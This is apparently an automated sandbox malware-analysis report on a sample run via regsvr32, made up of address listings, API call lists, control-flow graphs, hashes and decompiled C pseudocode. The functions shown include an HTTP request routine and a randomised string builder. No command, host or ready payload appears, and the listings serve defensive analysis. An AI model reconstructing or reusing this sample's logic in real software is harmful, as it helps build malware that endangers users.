                                0x02bd984e
                                0x02bd9855
                                0x02bd9862
                                0x02bd9862
                                0x02bd9862
                                0x02bd9855
                                0x02bd984c
                                0x02bd9867
                                0x00000000
                                0x00000000
                                0x02bd986d

                                APIs
                                • ResetEvent.KERNEL32(?,00000008,?,?,00000102,02BD937B,?,?,00000000,00000000), ref: 02BD9831
                                • ResetEvent.KERNEL32(?), ref: 02BD9836
                                • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 02BD9843
                                • GetLastError.KERNEL32 ref: 02BD984E
                                • GetLastError.KERNEL32(?,?,00000102,02BD937B,?,?,00000000,00000000), ref: 02BD9869
                                  • Part of subcall function 02BD8CFA: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,02BD9816,?,?,?,?,00000102,02BD937B,?,?,00000000), ref: 02BD8D06
                                  • Part of subcall function 02BD8CFA: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02BD9816,?,?,?,?,00000102,02BD937B,?), ref: 02BD8D64
                                  • Part of subcall function 02BD8CFA: lstrcpy.KERNEL32(00000000,00000000), ref: 02BD8D74
                                • SetEvent.KERNEL32(?), ref: 02BD985C
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                • String ID:
                                • API String ID: 3739416942-0
                                • Opcode ID: 3d964cd936041bc41fc21de19c254645616316c8c4c784c7d345eea7a388632c
                                • Instruction ID: 9c06bfb5801b5b5f469e6c14dfc8f72289d58079efe13fcfda79c0e345b38d5d
                                • Opcode Fuzzy Hash: 3d964cd936041bc41fc21de19c254645616316c8c4c784c7d345eea7a388632c
                                • Instruction Fuzzy Hash: 57018131181B01ABDB316B32DC44FDBBAA9EF48BA8F104B65F551D60E0F722F815DA61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD1128, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 294 2bd1128-2bd1137 RtlEnterCriticalSection 295 2bd1141-2bd114b 294->295 296 2bd114d-2bd1151 295->296 297 2bd1139-2bd113b Sleep 295->297 298 2bd1169-2bd116e call 2bd4a2a 296->298 299 2bd1153-2bd1158 296->299 297->295 302 2bd1173-2bd1185 RtlLeaveCriticalSection 298->302 299->298 300 2bd115a-2bd115d 299->300 300->298
                                C-Code - Quality: 50%
                                			E02BD1128(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x2bdd32c; // 0x50095b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x2bdd32c; // 0x50095b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x2bdd030) {
					HeapFree( *0x2bdd238, 0, _t8);
				}
				_t9 = E02BD4A2A(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x2bdd32c; // 0x50095b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                                0x02bd1128
                                0x02bd1128
                                0x02bd1131
                                0x02bd1141
                                0x02bd1141
                                0x02bd1146
                                0x02bd114b
                                0x00000000
                                0x00000000
                                0x02bd113b
                                0x02bd113b
                                0x02bd114d
                                0x02bd1151
                                0x02bd1163
                                0x02bd1163
                                0x02bd116e
                                0x02bd1173
                                0x02bd1176
                                0x02bd117b
                                0x02bd117f
                                0x02bd1185

                                APIs
                                • RtlEnterCriticalSection.NTDLL(05009570), ref: 02BD1131
                                • Sleep.KERNEL32(0000000A,?,02BD30F3), ref: 02BD113B
                                • HeapFree.KERNEL32(00000000,00000000,?,02BD30F3), ref: 02BD1163
                                • RtlLeaveCriticalSection.NTDLL(05009570), ref: 02BD117F
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID: Ut
                                • API String ID: 58946197-8415677
                                • Opcode ID: 394ab215f1c226969244b10bc34828f7af6d57cb82b9193323772ed9508b290a
                                • Instruction ID: bd11b855165274857c83ba039e0059c3441367d118226a64550c63cdb8782cd6
                                • Opcode Fuzzy Hash: 394ab215f1c226969244b10bc34828f7af6d57cb82b9193323772ed9508b290a
                                • Instruction Fuzzy Hash: 96F03A72A822029FD7109F68DC68B867FA8EF043C0B408845F585C7150F320D8A0CB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD2F70, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 303 2bd2f70-2bd2f8b call 2bd59a4 306 2bd2f8d-2bd2f9b 303->306 307 2bd2fa1-2bd2faf 303->307 306->307 309 2bd2fc1-2bd2fdc call 2bd2b6f 307->309 310 2bd2fb1-2bd2fb4 307->310 316 2bd2fde-2bd2fe4 309->316 317 2bd2fe6 309->317 310->309 311 2bd2fb6-2bd2fbb 310->311 311->309 313 2bd3142 311->313 315 2bd3144-2bd314a 313->315 318 2bd2fec-2bd3001 call 2bd9154 call 2bd8e0d 316->318 317->318 323 2bd300c-2bd3011 318->323 324 2bd3003-2bd3006 CloseHandle 318->324 325 2bd3037-2bd304f call 2bd1525 323->325 326 2bd3013-2bd3018 323->326 324->323 335 2bd307b-2bd307d 325->335 336 2bd3051-2bd3079 memset RtlInitializeCriticalSection 325->336 327 2bd312e-2bd3132 326->327 328 2bd301e 326->328 330 2bd313a-2bd3140 327->330 331 2bd3134-2bd3138 327->331 332 2bd3021-2bd3030 call 2bd8b7b 328->332 330->315 331->315 331->330 341 2bd3032 332->341 339 2bd307e-2bd3082 335->339 336->339 339->327 340 2bd3088-2bd309e RtlAllocateHeap 339->340 342 2bd30ce-2bd30d0 340->342 343 2bd30a0-2bd30cc wsprintfA 340->343 341->327 344 2bd30d1-2bd30d5 342->344 343->344 344->327 345 2bd30d7-2bd30f7 call 2bd7a2e call 2bd7fbe 344->345 345->327 350 2bd30f9-2bd3100 call 2bd50e8 345->350 353 2bd3107-2bd310e 350->353 354 2bd3102-2bd3105 350->354 355 2bd3110-2bd3112 353->355 356 2bd3123-2bd3127 call 2bd7c3d 353->356 354->327 355->327 358 2bd3114-2bd3121 call 2bd46b2 355->358 360 2bd312c 356->360 358->327 358->356 360->327
                                C-Code - Quality: 57%
                                			E02BD2F70(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E02BD59A4();
				if(_t21 != 0) {
					_t59 =  *0x2bdd25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x2bdd25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x2bdd160(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E02BD2B6F( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x2bdd2a8; // 0x242a5a8
					if( *0x2bdd25c > 5) {
						_t8 = _t26 + 0x2bde5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x2bde9f5; // 0x44283a44
						_t27 = _t7;
					}
					E02BD9154(_t27, _t27);
					_t31 = E02BD8E0D(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x2bdd270 =  *0x2bdd270 ^ 0x81bbe65d;
						_t32 = E02BD1525(0x60);
						 *0x2bdd32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x2bdd32c; // 0x50095b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x2bdd32c; // 0x50095b0
							 *_t51 = 0x2bde81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x2bdd238, 0, 0x43);
							 *0x2bdd2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x2bdd25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x2bdd2a8; // 0x242a5a8
								_t13 = _t58 + 0x2bde55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x2bdc287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E02BD7A2E( ~_v8 &  *0x2bdd270,  &E02BDD00C); // executed
								_t42 = E02BD7FBE(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E02BD50E8(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E02BD7C3D(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E02BD46B2(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x2bdd15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E02BD8B7B(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                                0x02bd2f70
                                0x02bd2f7b
                                0x02bd2f7e
                                0x02bd2f81
                                0x02bd2f84
                                0x02bd2f8b
                                0x02bd2f8d
                                0x02bd2f99
                                0x02bd2f9b
                                0x02bd2f9b
                                0x02bd2fa4
                                0x02bd2faa
                                0x02bd2faf
                                0x02bd2fc9
                                0x02bd2fd5
                                0x02bd2fd7
                                0x02bd2fdc
                                0x02bd2fe6
                                0x02bd2fe6
                                0x02bd2fde
                                0x02bd2fde
                                0x02bd2fde
                                0x02bd2fde
                                0x02bd2fed
                                0x02bd2ffa
                                0x02bd3001
                                0x02bd3006
                                0x02bd3006
                                0x02bd300e
                                0x02bd3011
                                0x02bd3037
                                0x02bd3043
                                0x02bd3048
                                0x02bd304d
                                0x02bd304f
                                0x02bd307b
                                0x02bd307d
                                0x02bd3051
                                0x02bd3055
                                0x02bd305a
                                0x02bd305f
                                0x02bd3066
                                0x02bd306c
                                0x02bd3071
                                0x02bd3077
                                0x02bd307e
                                0x02bd3080
                                0x02bd3082
                                0x02bd3091
                                0x02bd3097
                                0x02bd309c
                                0x02bd309e
                                0x02bd30ce
                                0x02bd30d0
                                0x02bd30a0
                                0x02bd30a0
                                0x02bd30a6
                                0x02bd30b3
                                0x02bd30b9
                                0x02bd30b9
                                0x02bd30c1
                                0x02bd30ca
                                0x02bd30d1
                                0x02bd30d3
                                0x02bd30d5
                                0x02bd30dc
                                0x02bd30e9
                                0x02bd30ee
                                0x02bd30f3
                                0x02bd30f5
                                0x02bd30f7
                                0x00000000
                                0x00000000
                                0x02bd30f9
                                0x02bd30fe
                                0x02bd3100
                                0x02bd3107
                                0x02bd310b
                                0x02bd310e
                                0x02bd3123
                                0x02bd3127
                                0x02bd312c
                                0x00000000
                                0x02bd312c
                                0x02bd3110
                                0x02bd3112
                                0x00000000
                                0x00000000
                                0x02bd311d
                                0x02bd311f
                                0x02bd3121
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02bd3121
                                0x02bd3104
                                0x02bd3104
                                0x02bd30d5
                                0x02bd3013
                                0x02bd3013
                                0x02bd3018
                                0x02bd312e
                                0x02bd3132
                                0x02bd313a
                                0x02bd313a
                                0x00000000
                                0x02bd3132
                                0x02bd301e
                                0x02bd3021
                                0x02bd302b
                                0x02bd3032
                                0x00000000
                                0x02bd3142
                                0x02bd3142
                                0x02bd3146
                                0x02bd314a
                                0x02bd314a

                                APIs
                                  • Part of subcall function 02BD59A4: GetModuleHandleA.KERNEL32(4C44544E,00000000,02BD2F89,00000000,00000000), ref: 02BD59B3
                                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02BD3006
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • memset.NTDLL ref: 02BD3055
                                • RtlInitializeCriticalSection.NTDLL(05009570), ref: 02BD3066
                                  • Part of subcall function 02BD46B2: memset.NTDLL ref: 02BD46C7
                                  • Part of subcall function 02BD46B2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02BD4709
                                  • Part of subcall function 02BD46B2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 02BD4714
                                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02BD3091
                                • wsprintfA.USER32 ref: 02BD30C1
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                • String ID:
                                • API String ID: 4246211962-0
                                • Opcode ID: 4b871b1bc4c72e4155a915f304db5ab387169d3a3b0b3f5490c7af672afaac3a
                                • Instruction ID: 700c20b5b9a0018441b53bdddbc2c712dcc227ec517186f9ce989f188c2d237d
                                • Opcode Fuzzy Hash: 4b871b1bc4c72e4155a915f304db5ab387169d3a3b0b3f5490c7af672afaac3a
                                • Instruction Fuzzy Hash: 0E512276E82216ABDB20ABB4DC99BEE7BE8EB04744F0448E5E541D7142F770C984CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD2D74, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 362 2bd2d74-2bd2da1 call 2bd1525 365 2bd2ef5-2bd2ef7 362->365 366 2bd2da7-2bd2dad 362->366 368 2bd2ef8-2bd2efe 365->368 367 2bd2daf-2bd2db3 366->367 369 2bd2dfb-2bd2dfd 367->369 370 2bd2db5-2bd2db7 367->370 371 2bd2dff-2bd2e02 369->371 372 2bd2e0a-2bd2e0e 369->372 373 2bd2db9-2bd2dbb 370->373 374 2bd2de1-2bd2de3 370->374 375 2bd2e04 371->375 376 2bd2e07 371->376 378 2bd2ee8 372->378 379 2bd2e14-2bd2e2c call 2bd1525 372->379 373->374 377 2bd2dbd-2bd2dbf 373->377 380 2bd2de5-2bd2de8 374->380 381 2bd2df2 374->381 375->376 376->372 384 2bd2dde-2bd2ddf 377->384 385 2bd2dc1-2bd2dc3 377->385 383 2bd2eea 378->383 395 2bd2ee4-2bd2ee6 379->395 396 2bd2e32-2bd2e42 379->396 387 2bd2ded-2bd2df0 380->387 388 2bd2dea 380->388 382 2bd2df5-2bd2df9 381->382 382->367 382->369 389 2bd2eeb-2bd2ef3 call 2bd8b22 383->389 384->382 385->372 390 2bd2dc5-2bd2dd6 385->390 387->381 388->387 389->368 393 2bd2dd8 390->393 394 2bd2ddb-2bd2ddd 390->394 393->394 394->384 395->383 398 2bd2e48 396->398 399 2bd2eda-2bd2ee2 396->399 400 2bd2e4d-2bd2e94 lstrcpy lstrcat 398->400 399->389 401 2bd2eb7-2bd2ed4 lstrlen 400->401 402 2bd2e96-2bd2ea5 lstrcmp 400->402 401->399 401->400 403 2bd2eb4 402->403 404 2bd2ea7-2bd2eb0 402->404 403->401 404->402 405 2bd2eb2 404->405 405->401
                                C-Code - Quality: 22%
                                			E02BD2D74(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E02BD1525(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E02BD8B22(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E02BD1525((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x2bdd278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                0x02bd2d7b
                                0x02bd2d82
                                0x02bd2d87
                                0x02bd2d8a
                                0x02bd2d91
                                0x02bd2d94
                                0x02bd2d97
                                0x02bd2d9c
                                0x02bd2da1
                                0x02bd2ef5
                                0x02bd2ef7
                                0x02bd2ef9
                                0x02bd2efe
                                0x02bd2efe
                                0x02bd2da7
                                0x02bd2daa
                                0x02bd2dad
                                0x02bd2daf
                                0x02bd2daf
                                0x02bd2db3
                                0x00000000
                                0x00000000
                                0x02bd2db7
                                0x02bd2de3
                                0x02bd2de8
                                0x02bd2dea
                                0x02bd2dea
                                0x02bd2ded
                                0x02bd2df0
                                0x02bd2df0
                                0x02bd2df2
                                0x00000000
                                0x02bd2dbd
                                0x02bd2dbf
                                0x02bd2dde
                                0x02bd2dde
                                0x02bd2df5
                                0x02bd2df5
                                0x02bd2df6
                                0x02bd2df6
                                0x02bd2df9
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02bd2df9
                                0x02bd2dc3
                                0x02bd2e0a
                                0x02bd2e0e
                                0x02bd2ee8
                                0x02bd2eea
                                0x02bd2eea
                                0x02bd2eeb
                                0x02bd2eee
                                0x00000000
                                0x02bd2eee
                                0x02bd2e17
                                0x02bd2e28
                                0x02bd2e2c
                                0x02bd2ee4
                                0x00000000
                                0x02bd2ee4
                                0x02bd2e32
                                0x02bd2e35
                                0x02bd2e39
                                0x02bd2e3d
                                0x02bd2e42
                                0x02bd2eda
                                0x02bd2eda
                                0x00000000
                                0x02bd2ee0
                                0x02bd2e4d
                                0x02bd2e56
                                0x02bd2e6a
                                0x02bd2e71
                                0x02bd2e86
                                0x02bd2e8c
                                0x02bd2e94
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02bd2e96
                                0x02bd2e96
                                0x02bd2e96
                                0x02bd2e9d
                                0x02bd2ea5
                                0x00000000
                                0x00000000
                                0x02bd2ea7
                                0x02bd2eb0
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02bd2eb2
                                0x02bd2eb4
                                0x02bd2eb7
                                0x02bd2eb7
                                0x02bd2eba
                                0x02bd2ebe
                                0x02bd2ec1
                                0x02bd2ec7
                                0x02bd2eca
                                0x02bd2ed1
                                0x00000000
                                0x02bd2e4d
                                0x02bd2dc8
                                0x02bd2dd0
                                0x02bd2dd6
                                0x02bd2dd8
                                0x02bd2dd8
                                0x02bd2ddb
                                0x02bd2ddd
                                0x00000000
                                0x02bd2ddd
                                0x02bd2db7
                                0x02bd2dfd
                                0x02bd2e02
                                0x02bd2e04
                                0x02bd2e04
                                0x02bd2e07
                                0x02bd2e07
                                0x00000000

                                APIs
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 02BD2E71
                                • lstrcat.KERNEL32(69B25F45,00000020), ref: 02BD2E86
                                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 02BD2E9D
                                • lstrlen.KERNEL32(69B25F45), ref: 02BD2EC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: 796d5848361c914a0c212636da0bdfa9006fb47507ed4d0ae4e862a2eedbf086
                                • Instruction ID: 2370a80d0a54777f7a98ab330801ff98fdcca340e36425a95896f6ba6c2646f7
                                • Opcode Fuzzy Hash: 796d5848361c914a0c212636da0bdfa9006fb47507ed4d0ae4e862a2eedbf086
                                • Instruction Fuzzy Hash: 4D51A271A00158EBCF11CFA9C8847EDBBB6FF55318F15809AEC159B202E7309A51CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD5319, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E02BD5319(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E02BD155A(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x2bdd2a8; // 0x242a5a8
				_t4 = _t24 + 0x2bdedc0; // 0x5009368
				_t5 = _t24 + 0x2bded68; // 0x4f0053
				_t26 = E02BD5D79( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x2bdd2a8; // 0x242a5a8
						_t11 = _t32 + 0x2bdedb4; // 0x500935c
						_t48 = _t11;
						_t12 = _t32 + 0x2bded68; // 0x4f0053
						_t52 = E02BD272D(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x2bdd2a8; // 0x242a5a8
							_t13 = _t35 + 0x2bdedfe; // 0x30314549
							if(E02BD5B05(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x2bdd25c - 6;
								if( *0x2bdd25c <= 6) {
									_t42 =  *0x2bdd2a8; // 0x242a5a8
									_t15 = _t42 + 0x2bdec0a; // 0x52384549
									E02BD5B05(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x2bdd2a8; // 0x242a5a8
							_t17 = _t38 + 0x2bdedf8; // 0x50093a0
							_t18 = _t38 + 0x2bdedd0; // 0x680043
							_t45 = E02BD4538(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x2bdd238, 0, _t52);
						}
					}
					HeapFree( *0x2bdd238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E02BD4FF0(_t54);
				}
				return _t45;
			}


















                                0x02bd5319
                                0x02bd5329
                                0x02bd532c
                                0x02bd5333
                                0x02bd5335
                                0x02bd5335
                                0x02bd5338
                                0x02bd533d
                                0x02bd5344
                                0x02bd5351
                                0x02bd5356
                                0x02bd535a
                                0x02bd5368
                                0x02bd5376
                                0x02bd537a
                                0x02bd540b
                                0x02bd540b
                                0x02bd5380
                                0x02bd5380
                                0x02bd5385
                                0x02bd5385
                                0x02bd538c
                                0x02bd5398
                                0x02bd539a
                                0x02bd539c
                                0x02bd539e
                                0x02bd53a5
                                0x02bd53b7
                                0x02bd53b9
                                0x02bd53c0
                                0x02bd53c2
                                0x02bd53c9
                                0x02bd53d4
                                0x02bd53d4
                                0x02bd53c0
                                0x02bd53d9
                                0x02bd53de
                                0x02bd53e5
                                0x02bd5403
                                0x02bd5405
                                0x02bd5405
                                0x02bd539c
                                0x02bd5417
                                0x02bd5417
                                0x02bd5419
                                0x02bd541e
                                0x02bd5420
                                0x02bd5420
                                0x02bd542b

                                APIs
                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05009368,00000000,?,74E5F710,00000000,74E5F730), ref: 02BD5368
                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,050093A0,?,00000000,30314549,00000014,004F0053,0500935C), ref: 02BD5405
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02BD7CCB), ref: 02BD5417
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
